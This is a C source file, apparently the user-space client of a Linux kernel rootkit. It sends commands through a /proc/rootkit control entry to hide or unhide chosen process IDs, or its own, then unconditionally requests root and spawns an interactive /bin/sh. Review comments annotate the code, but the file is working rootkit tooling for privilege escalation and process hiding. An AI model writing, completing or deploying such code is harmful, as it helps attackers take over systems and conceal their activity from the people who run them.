client.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
#include <math.h>
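/*
 * Command keywords this client writes to the control entry. The hide and
 * unhide keywords are followed directly by a decimal pid ("hidepid1234").
 * The code that interprets them is not part of this file.
 */
#define RTKIT_HIDEPID_CMD "hidepid"
#define RTKIT_UNHIDEPID_CMD "unhidepid"
#define RTKIT_GETROOTPERM_CMD "root"

/* procfs path the client opens read/write and sends every command to. */
#define RTKIT_PROCFS_ENTRYNAME "/proc/rootkit"

/* Value for the curproc argument of pid_hide_unhide: use getpid(), not optarg. */
#define CURRENT_PROCESS 1

/* Size in bytes of the command buffers that pid_hide_unhide formats into. */
#define BUF_SIZE 16

/* Appended to the caller's error tag when the pid is outside [0, 2^22]. */
#define pid_err "[ERROR] pid exceeds maximum limit\n"

/*
 * getopt() option string: the leading '+' stops parsing at the first
 * non-option (GNU extension), the ':' that follows makes getopt return ':'
 * for a missing argument, -h and -s take an argument, -c takes none.
 */
#define OPTS_STR "+:h:s:c"

/*
 * Print msg with prnt_func (printf or perror in this file) and return
 * err_code from the ENCLOSING function. msg is used as a printf format when
 * prnt_func is printf, so pass string literals without conversions only.
 * NOTE(review): the name sits in the implementation-reserved namespace
 * (leading double underscore); kept because callers use it.
 */
#define __err(msg,prnt_func,err_code) \
do{ \
    prnt_func(msg); \
    return err_code; \
}while(0)

/*
 * Print a usage error for option character opt and return -1 from the
 * enclosing function. errmsg must be a literal format with one %c.
 */
#define usage_err(errmsg,opt) \
do{ \
    printf(errmsg,opt); \
    return -1; \
}while(0)

/*
 * Build "<cmd><pid>" in cmd_buf and write it to fd.
 *
 *   fd       open descriptor of the control entry
 *   pidvar   pid_t lvalue that receives the pid that was used
 *   cmd_buf  char array of BUF_SIZE bytes
 *   cmd      string LITERAL keyword (it is pasted onto the "%d" format)
 *   curproc  non-zero: use getpid(); zero: parse the pid from optarg
 *   errmsg   string LITERAL tag printed in front of every error
 *
 * Any failure returns -1 from the enclosing function.
 *
 * The pid is parsed with strtol() and must be a complete decimal number;
 * atoi() silently accepted trailing garbage, mapped non-numeric text to 0
 * and is undefined for out-of-range input. The accepted range stays
 * [0, 2^22], now computed without the floating-point pow() call.
 *
 * The command is formatted with snprintf(): "unhidepid" (9 bytes) plus a
 * 7-digit pid plus the terminator needs 17 bytes, one more than BUF_SIZE,
 * which the former unbounded sprintf() wrote past the end of cmd_buf. A
 * command that does not fit is now rejected instead of being sent.
 */
#define pid_hide_unhide(fd,pidvar,cmd_buf,cmd,curproc,errmsg) \
do{ \
    int rk_cmd_len; \
    if (curproc) \
    { \
        pidvar = getpid(); \
    } \
    else \
    { \
        char *rk_pid_end; \
        long rk_pid_val = strtol(optarg,&rk_pid_end,10); \
        if ((rk_pid_end == optarg) || (*rk_pid_end != '\0')) \
            __err(errmsg "[ERROR] pid is not a decimal number\n",printf,-1); \
        if ((rk_pid_val > (1L << 22)) || (rk_pid_val <= -1)) \
            __err(errmsg pid_err,printf,-1); \
        pidvar = (pid_t)rk_pid_val; \
    } \
    memset(cmd_buf,0x0,BUF_SIZE); \
    rk_cmd_len = snprintf(cmd_buf,BUF_SIZE,cmd"%d",(int)pidvar); \
    if ((rk_cmd_len < 0) || (rk_cmd_len >= BUF_SIZE)) \
        __err(errmsg "[ERROR] command does not fit buffer\n",printf,-1); \
    if (write(fd,cmd_buf,(size_t)rk_cmd_len) < 0) \
        __err(errmsg,perror,-1); \
}while(0)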
/*
 * Entry point of the user-space control client.
 *
 * Opens RTKIT_PROCFS_ENTRYNAME read/write, turns each command-line option
 * into a text command written to that descriptor, then unconditionally
 * writes RTKIT_GETROOTPERM_CMD and starts /bin/sh through system().
 *
 * Options (see OPTS_STR):
 *   -h <pid>  write "hidepid<pid>"
 *   -s <pid>  write "unhidepid<pid>"
 *   -c        write "hidepid<own pid>"
 *
 * Returns -1 as soon as the open, an option or a write fails; the return
 * statements are inside the __err, usage_err and pid_hide_unhide macros.
 * There is no explicit return after system(), so the normal path falls off
 * the end of main.
 *
 * What the run looks like from the outside, going by the calls below: an
 * O_RDWR open of the procfs entry, short writes of "hidepid<N>",
 * "unhidepid<N>" or "root" to it, then a /bin/sh child. The descriptor is
 * never closed in this function, so it stays open for the lifetime of the
 * process and of the shell that system() starts.
 */
int main(int argc,char **argv)
{
/* Command buffers filled by pid_hide_unhide; -h and -c share hidepid_cmd. */
char hidepid_cmd[BUF_SIZE];
char unhidepid_cmd[BUF_SIZE];
int opt,fd;
/* Receive the pid used by each option; not read again in this function. */
pid_t cur_pid,hidden_pid,unhidden_pid;
/* Every command below goes through this one descriptor. */
fd = open(RTKIT_PROCFS_ENTRYNAME,O_RDWR);
if (fd < 0)
__err("[__ERROR_1__]",perror,-1);
/* Options are handled in command-line order, one write per option. */
while((opt = getopt(argc,argv,OPTS_STR)) != -1)
{
switch (opt)
{
case 's':
/* -s <pid>: unhide the given pid. The 9-character keyword plus a 7-digit
 * pid and the terminator is 17 bytes, so such a pid does not fit
 * unhidepid_cmd (BUF_SIZE is 16). */
pid_hide_unhide(fd,
unhidden_pid,
unhidepid_cmd,
RTKIT_UNHIDEPID_CMD,
!CURRENT_PROCESS,
"[__ERROR_2__]");
break;
case 'h':
/* -h <pid>: hide the given pid. */
pid_hide_unhide(fd,
hidden_pid,
hidepid_cmd,
RTKIT_HIDEPID_CMD,
!CURRENT_PROCESS,
"[__ERROR_3__]");
break;
case 'c':
/* -c: hide this client's own pid (the macro calls getpid(), optarg is unused). */
pid_hide_unhide(fd,
cur_pid,
hidepid_cmd,
RTKIT_HIDEPID_CMD,
CURRENT_PROCESS,
"[__ERROR_4__]");
break;
case '?':
/* Unknown option; usage_err returns, so the break below is never reached. */
usage_err("[__ERROR__]unrecognized option [%c]\n",optopt);
break;
case ':':
/* -h or -s given without its argument. */
usage_err("[__ERROR__]missing argument to [%c] option\n",optopt);
}
}
/* Sent on every successful run, whether or not any option was given.
 * NOTE(review): presumably the handler behind the procfs entry raises the
 * writing process's credentials; that code is not in this file. */
if (write(fd,RTKIT_GETROOTPERM_CMD,strlen(RTKIT_GETROOTPERM_CMD)) < 0)
__err("[__ERROR_5__]",perror,-1);
/* Interactive shell as a child of this process; the return value of
 * system() is ignored. */
system("/bin/sh");
}